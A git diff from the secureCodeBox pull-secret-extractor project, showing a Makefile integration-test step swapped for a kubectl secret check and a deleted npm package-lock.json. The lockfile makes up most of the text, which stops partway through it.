auto-discovery/kubernetes/pull-secret-extractor/integration-test/pull-secret-extraction.test.js diff --git a/auto-discovery/kubernetes/pull-secret-extractor/Makefile b/auto-discovery/kubernetes/pull-secret-extractor/Makefile index bce3246e94..2f2b2b0dbb 100644 --- a/auto-discovery/kubernetes/pull-secret-extractor/Makefile +++ b/auto-discovery/kubernetes/pull-secret-extractor/Makefile @@ -49,7 +49,7 @@ integration-test: docker-build docker-export kind-import ./integration-test/test-pod.sh ${IMG_NS}/${IMG}:${IMG_TAG} kubectl wait --for=condition=ready --timeout=60s -n integration-test pod/init-container-test - cd integration-test && npm ci && npm run test:integration + kubectl get secret --namespace integration-test test-secret ##@ Build diff --git a/auto-discovery/kubernetes/pull-secret-extractor/integration-test/package-lock.json b/auto-discovery/kubernetes/pull-secret-extractor/integration-test/package-lock.json deleted file mode 100644 index d40ddfc16c..0000000000 --- a/auto-discovery/kubernetes/pull-secret-extractor/integration-test/package-lock.json +++ /dev/null @@ -1,10363 +0,0 @@ -{ - "name": "securecodebox-pull-secret-extractor-test", - "version": "1.0.0", - "lockfileVersion": 2, - "requires": true, - "packages": { - "": { - "name": "securecodebox-pull-secret-extractor-test", - "version": "1.0.0", - "license": "Apache-2.0", - "dependencies": { - "@kubernetes/client-node": "^0.22.3" - }, - "devDependencies": { - "jest": "^29.7.0", - "jest-runner-eslint": "^2.2.1" - } - }, - "node_modules/@aashutoshrathi/word-wrap": { - "version": "1.2.6", - "resolved": "https://registry.npmjs.org/@aashutoshrathi/word-wrap/-/word-wrap-1.2.6.tgz", - "integrity": "sha512-1Yjs2SvM8TflER/OD3cOjhWWOZb58A2t7wpE2S9XfBYTiIl+XFhQG2bjy4Pu1I+EAlCNUzRDYDdFwFYUKvXcIA==", - "dev": true, - "peer": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/@ampproject/remapping": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.3.0.tgz", - "integrity": "sha512-30iZtAPgz+LTIYoeivqYo853f02jBYSd5uGnGpkFV0M3xOt9aN73erkgYAmZU43x4VfqcnLxW9Kpg3R5LC4YYw==", - "dev": true, - "dependencies": { - "@jridgewell/gen-mapping": "^0.3.5", - "@jridgewell/trace-mapping": "^0.3.24" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@babel/code-frame": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.26.2.tgz", - "integrity": "sha512-RJlIHRueQgwWitWgF8OdFYGZX328Ax5BCemNGlqHfplnRT9ESi8JkFlvaVYbS+UubVY6dpv87Fs2u5M29iNFVQ==", - "dev": true, - "dependencies": { - "@babel/helper-validator-identifier": "^7.25.9", - "js-tokens": "^4.0.0", - "picocolors": "^1.0.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/compat-data": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.26.2.tgz", - "integrity": "sha512-Z0WgzSEa+aUcdiJuCIqgujCshpMWgUpgOxXotrYPSA53hA3qopNaqcJpyr0hVb1FeWdnqFA35/fUtXgBK8srQg==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/core": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.26.0.tgz", - "integrity": "sha512-i1SLeK+DzNnQ3LL/CswPCa/E5u4lh1k6IAEphON8F+cXt0t9euTshDru0q7/IqMa1PMPz5RnHuHscF8/ZJsStg==", - "dev": true, - "dependencies": { - "@ampproject/remapping": "^2.2.0", - "@babel/code-frame": "^7.26.0", - "@babel/generator": "^7.26.0", - "@babel/helper-compilation-targets": "^7.25.9", - "@babel/helper-module-transforms": "^7.26.0", - "@babel/helpers": "^7.26.0", - "@babel/parser": "^7.26.0", - "@babel/template": "^7.25.9", - "@babel/traverse": "^7.25.9", - "@babel/types": "^7.26.0", - "convert-source-map": "^2.0.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.2.3", - "semver": "^6.3.1" - }, - "engines": { - "node": ">=6.9.0" - }, - "funding": { - "type": "opencollective", - "url": "https://opencollective.com/babel" - } - }, - "node_modules/@babel/generator": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.26.2.tgz", - "integrity": "sha512-zevQbhbau95nkoxSq3f/DC/SC+EEOUZd3DYqfSkMhY2/wfSeaHV1Ew4vk8e+x8lja31IbyuUa2uQ3JONqKbysw==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.26.2", - "@babel/types": "^7.26.0", - "@jridgewell/gen-mapping": "^0.3.5", - "@jridgewell/trace-mapping": "^0.3.25", - "jsesc": "^3.0.2" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-compilation-targets": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.25.9.tgz", - "integrity": "sha512-j9Db8Suy6yV/VHa4qzrj9yZfZxhLWQdVnRlXxmKLYlhWUVB1sB2G5sxuWYXk/whHD9iW76PmNzxZ4UCnTQTVEQ==", - "dev": true, - "dependencies": { - "@babel/compat-data": "^7.25.9", - "@babel/helper-validator-option": "^7.25.9", - "browserslist": "^4.24.0", - "lru-cache": "^5.1.1", - "semver": "^6.3.1" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-module-imports": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.25.9.tgz", - "integrity": "sha512-tnUA4RsrmflIM6W6RFTLFSXITtl0wKjgpnLgXyowocVPrbYrLUXSBXDgTs8BlbmIzIdlBySRQjINYs2BAkiLtw==", - "dev": true, - "dependencies": { - "@babel/traverse": "^7.25.9", - "@babel/types": "^7.25.9" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-module-transforms": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.26.0.tgz", - "integrity": "sha512-xO+xu6B5K2czEnQye6BHA7DolFFmS3LB7stHZFaOLb1pAwO1HWLS8fXA+eh0A2yIvltPVmx3eNNDBJA2SLHXFw==", - "dev": true, - "dependencies": { - "@babel/helper-module-imports": "^7.25.9", - "@babel/helper-validator-identifier": "^7.25.9", - "@babel/traverse": "^7.25.9" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/@babel/helper-plugin-utils": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.25.9.tgz", - "integrity": "sha512-kSMlyUVdWe25rEsRGviIgOWnoT/nfABVWlqt9N19/dIPWViAOW2s9wznP5tURbs/IDuNk4gPy3YdYRgH3uxhBw==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-string-parser": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.25.9.tgz", - "integrity": "sha512-4A/SCr/2KLd5jrtOMFzaKjVtAei3+2r/NChoBNoZ3EyP/+GlhoaEGoWOZUmFmoITP7zOJyHIMm+DYRd8o3PvHA==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-validator-identifier": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.25.9.tgz", - "integrity": "sha512-Ed61U6XJc3CVRfkERJWDz4dJwKe7iLmmJsbOGu9wSloNSFttHV0I8g6UAgb7qnK5ly5bGLPd4oXZlxCdANBOWQ==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helper-validator-option": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.25.9.tgz", - "integrity": "sha512-e/zv1co8pp55dNdEcCynfj9X7nyUKUXoUEwfXqaZt0omVOmDe9oOTdKStH4GmAw6zxMFs50ZayuMfHDKlO7Tfw==", - "dev": true, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/helpers": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.26.0.tgz", - "integrity": "sha512-tbhNuIxNcVb21pInl3ZSjksLCvgdZy9KwJ8brv993QtIVKJBBkYXz4q4ZbAv31GdnC+R90np23L5FbEBlthAEw==", - "dev": true, - "dependencies": { - "@babel/template": "^7.25.9", - "@babel/types": "^7.26.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/parser": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.26.2.tgz", - "integrity": "sha512-DWMCZH9WA4Maitz2q21SRKHo9QXZxkDsbNZoVD62gusNtNBBqDg9i7uOhASfTfIGNzW+O+r7+jAlM8dwphcJKQ==", - "dev": true, - "dependencies": { - "@babel/types": "^7.26.0" - }, - "bin": { - "parser": "bin/babel-parser.js" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.12.13" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-class-static-block": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-static-block/-/plugin-syntax-class-static-block-7.14.5.tgz", - "integrity": "sha512-b+YyPmr6ldyNnM6sqYeMWE+bgJcJpO6yS4QD7ymxgH34GBPNDM/THBh8iunyvKIZztiwLH4CJZ0RxTk9emgpjw==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-import-attributes": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-attributes/-/plugin-syntax-import-attributes-7.26.0.tgz", - "integrity": "sha512-e2dttdsJ1ZTpi3B9UYGLw41hifAubg19AtCu/2I/F1QNVclOBr1dYpTdmdyZ84Xiz43BS/tCUkMAZNLv12Pi+A==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.25.9" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-import-meta": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", - "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-json-strings": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", - "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-jsx": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.25.9.tgz", - "integrity": "sha512-ld6oezHQMZsZfp6pWtbjaNDF2tiiCYYDqQszHt5VV437lewP9aSi2Of99CK0D0XB21k7FLgnLcmQKyKzynfeAA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.25.9" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-logical-assignment-operators": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", - "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-nullish-coalescing-operator": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", - "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-numeric-separator": { - "version": "7.10.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", - "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.10.4" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-object-rest-spread": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", - "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-optional-catch-binding": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", - "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-optional-chaining": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", - "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.8.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-private-property-in-object": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-private-property-in-object/-/plugin-syntax-private-property-in-object-7.14.5.tgz", - "integrity": "sha512-0wVnp9dxJ72ZUJDV27ZfbSj6iHLoytYZmh3rFcxNnvsJF3ktkzLDZPy/mA17HGsaQT3/DQsWYX1f1QGWkCoVUg==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-top-level-await": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", - "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.14.5" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/plugin-syntax-typescript": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.25.9.tgz", - "integrity": "sha512-hjMgRy5hb8uJJjUcdWunWVcoi9bGpJp8p5Ol1229PoN6aytsLwNMgmdftO23wnCLMfVmTwZDWMPNq/D1SY60JQ==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.25.9" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/template": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.25.9.tgz", - "integrity": "sha512-9DGttpmPvIxBb/2uwpVo3dqJ+O6RooAFOS+lB+xDqoE2PVCE8nfoHMdZLpfCQRLwvohzXISPZcgxt80xLfsuwg==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.25.9", - "@babel/parser": "^7.25.9", - "@babel/types": "^7.25.9" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/traverse": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.25.9.tgz", - "integrity": "sha512-ZCuvfwOwlz/bawvAuvcj8rrithP2/N55Tzz342AkTvq4qaWbGfmCk/tKhNaV2cthijKrPAA8SRJV5WWe7IBMJw==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.25.9", - "@babel/generator": "^7.25.9", - "@babel/parser": "^7.25.9", - "@babel/template": "^7.25.9", - "@babel/types": "^7.25.9", - "debug": "^4.3.1", - "globals": "^11.1.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/traverse/node_modules/globals": { - "version": "11.12.0", - "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/@babel/types": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.26.0.tgz", - "integrity": "sha512-Z/yiTPj+lDVnF7lWeKCIJzaIkI0vYO87dMpZ4bg4TDrFe4XXLFWL1TbXU27gBP3QccxV9mZICCrnjnYlJjXHOA==", - "dev": true, - "dependencies": { - "@babel/helper-string-parser": "^7.25.9", - "@babel/helper-validator-identifier": "^7.25.9" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true - }, - "node_modules/@eslint-community/eslint-utils": { - "version": "4.4.0", - "resolved": "https://registry.npmjs.org/@eslint-community/eslint-utils/-/eslint-utils-4.4.0.tgz", - "integrity": "sha512-1/sA4dwrzBAyeUoQ6oxahHKmrZvsnLCg4RfxW3ZFGGmQkSNQPFNLV9CUEFQP1x9EYXHTo5p6xdhZM1Ne9p/AfA==", - "dev": true, - "peer": true, - "dependencies": { - "eslint-visitor-keys": "^3.3.0" - }, - "engines": { - "node": "^12.22.0 || ^14.17.0 || >=16.0.0" - }, - "peerDependencies": { - "eslint": "^6.0.0 || ^7.0.0 || >=8.0.0" - } - }, - "node_modules/@eslint-community/regexpp": { - "version": "4.5.1", - "resolved": "https://registry.npmjs.org/@eslint-community/regexpp/-/regexpp-4.5.1.tgz", - "integrity": "sha512-Z5ba73P98O1KUYCCJTUeVpja9RcGoMdncZ6T49FCUl2lN38JtCJ+3WgIDBv0AuY4WChU5PmtJmOCTlN6FZTFKQ==", - "dev": true, - "peer": true, - "engines": { - "node": "^12.0.0 || ^14.0.0 || >=16.0.0" - } - }, - "node_modules/@eslint/eslintrc": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/@eslint/eslintrc/-/eslintrc-2.1.0.tgz", - "integrity": "sha512-Lj7DECXqIVCqnqjjHMPna4vn6GJcMgul/wuS0je9OZ9gsL0zzDpKPVtcG1HaDVc+9y+qgXneTeUMbCqXJNpH1A==", - "dev": true, - "peer": true, - "dependencies": { - "ajv": "^6.12.4", - "debug": "^4.3.2", - "espree": "^9.6.0", - "globals": "^13.19.0", - "ignore": "^5.2.0", - "import-fresh": "^3.2.1", - "js-yaml": "^4.1.0", - "minimatch": "^3.1.2", - "strip-json-comments": "^3.1.1" - }, - "engines": { - "node": "^12.22.0 || ^14.17.0 || >=16.0.0" - }, - "funding": { - "url": "https://opencollective.com/eslint" - } - }, - "node_modules/@eslint/js": { - "version": "8.44.0", - "resolved": "https://registry.npmjs.org/@eslint/js/-/js-8.44.0.tgz", - "integrity": "sha512-Ag+9YM4ocKQx9AarydN0KY2j0ErMHNIocPDrVo8zAE44xLTjEtz81OdR68/cydGtk6m6jDb5Za3r2useMzYmSw==", - "dev": true, - "peer": true, - "engines": { - "node": "^12.22.0 || ^14.17.0 || >=16.0.0" - } - }, - "node_modules/@humanwhocodes/config-array": { - "version": "0.11.10", - "resolved": "https://registry.npmjs.org/@humanwhocodes/config-array/-/config-array-0.11.10.tgz", - "integrity": "sha512-KVVjQmNUepDVGXNuoRRdmmEjruj0KfiGSbS8LVc12LMsWDQzRXJ0qdhN8L8uUigKpfEHRhlaQFY0ib1tnUbNeQ==", - "dev": true, - "peer": true, - "dependencies": { - "@humanwhocodes/object-schema": "^1.2.1", - "debug": "^4.1.1", - "minimatch": "^3.0.5" - }, - "engines": { - "node": ">=10.10.0" - } - }, - "node_modules/@humanwhocodes/module-importer": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/@humanwhocodes/module-importer/-/module-importer-1.0.1.tgz", - "integrity": "sha512-bxveV4V8v5Yb4ncFTT3rPSgZBOpCkjfK0y4oVVVJwIuDVBRMDXrPyXRL988i5ap9m9bnyEEjWfm5WkBmtffLfA==", - "dev": true, - "peer": true, - "engines": { - "node": ">=12.22" - }, - "funding": { - "type": "github", - "url": "https://github.com/sponsors/nzakas" - } - }, - "node_modules/@humanwhocodes/object-schema": { - "version": "1.2.1", - "resolved": "https://registry.npmjs.org/@humanwhocodes/object-schema/-/object-schema-1.2.1.tgz", - "integrity": "sha512-ZnQMnLV4e7hDlUvw8H+U8ASL02SS2Gn6+9Ac3wGGLIe7+je2AeAOxPY+izIPJDfFDb7eDjev0Us8MO1iFRN8hA==", - "dev": true, - "peer": true - }, - "node_modules/@isaacs/cliui": { - "version": "8.0.2", - "resolved": "https://registry.npmjs.org/@isaacs/cliui/-/cliui-8.0.2.tgz", - "integrity": "sha512-O8jcjabXaleOG9DQ0+ARXWZBTfnP4WNAqzuiJK7ll44AmxGKv/J2M4TPjxjY3znBCfvBXFzucm1twdyFybFqEA==", - "dependencies": { - "string-width": "^5.1.2", - "string-width-cjs": "npm:string-width@^4.2.0", - "strip-ansi": "^7.0.1", - "strip-ansi-cjs": "npm:strip-ansi@^6.0.1", - "wrap-ansi": "^8.1.0", - "wrap-ansi-cjs": "npm:wrap-ansi@^7.0.0" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/@isaacs/cliui/node_modules/ansi-regex": { - "version": "6.1.0", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-6.1.0.tgz", - "integrity": "sha512-7HSX4QQb4CspciLpVFwyRe79O3xsIZDDLER21kERQ71oaPodF8jL725AgJMFAYbooIqolJoRLuM81SpeUkpkvA==", - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/chalk/ansi-regex?sponsor=1" - } - }, - "node_modules/@isaacs/cliui/node_modules/ansi-styles": { - "version": "6.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-6.2.1.tgz", - "integrity": "sha512-bN798gFfQX+viw3R7yrGWRqnrN2oRkEkUjjl4JNn4E8GxxbjtG3FbrEIIY3l8/hrwUwIeCZvi4QuOTP4MErVug==", - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/@isaacs/cliui/node_modules/emoji-regex": { - "version": "9.2.2", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-9.2.2.tgz", - "integrity": "sha512-L18DaJsXSUk2+42pv8mLs5jJT2hqFkFE4j21wOmgbUqsZ2hL72NsUU785g9RXgo3s0ZNgVl42TiHp3ZtOv/Vyg==" - }, - "node_modules/@isaacs/cliui/node_modules/string-width": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-5.1.2.tgz", - "integrity": "sha512-HnLOCR3vjcY8beoNLtcjZ5/nxn2afmME6lhrDrebokqMap+XbeW8n9TXpPDOqdGK5qcI3oT0GKTW6wC7EMiVqA==", - "dependencies": { - "eastasianwidth": "^0.2.0", - "emoji-regex": "^9.2.2", - "strip-ansi": "^7.0.1" - }, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/@isaacs/cliui/node_modules/strip-ansi": { - "version": "7.1.0", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-7.1.0.tgz", - "integrity": "sha512-iq6eVVI64nQQTRYq2KtEg2d2uU7LElhTJwsH4YzIHZshxlgZms/wIc4VoDQTlG/IvVIrBKG06CrZnp0qv7hkcQ==", - "dependencies": { - "ansi-regex": "^6.0.1" - }, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/chalk/strip-ansi?sponsor=1" - } - }, - "node_modules/@isaacs/cliui/node_modules/wrap-ansi": { - "version": "8.1.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-8.1.0.tgz", - "integrity": "sha512-si7QWI6zUMq56bESFvagtmzMdGOtoxfR+Sez11Mobfc7tm+VkUckk9bW2UeffTGVUbOksxmSw0AA2gs8g71NCQ==", - "dependencies": { - "ansi-styles": "^6.1.0", - "string-width": "^5.0.1", - "strip-ansi": "^7.0.1" - }, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" - } - }, - "node_modules/@isaacs/fs-minipass": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/@isaacs/fs-minipass/-/fs-minipass-4.0.1.tgz", - "integrity": "sha512-wgm9Ehl2jpeqP3zw/7mo3kRHFp5MEDhqAdwy1fTGkHAwnkGOVsgpvQhL8B5n1qlb01jV3n/bI0ZfZp5lWA1k4w==", - "dependencies": { - "minipass": "^7.0.4" - }, - "engines": { - "node": ">=18.0.0" - } - }, - "node_modules/@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, - "dependencies": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/@istanbuljs/load-nyc-config/node_modules/argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": 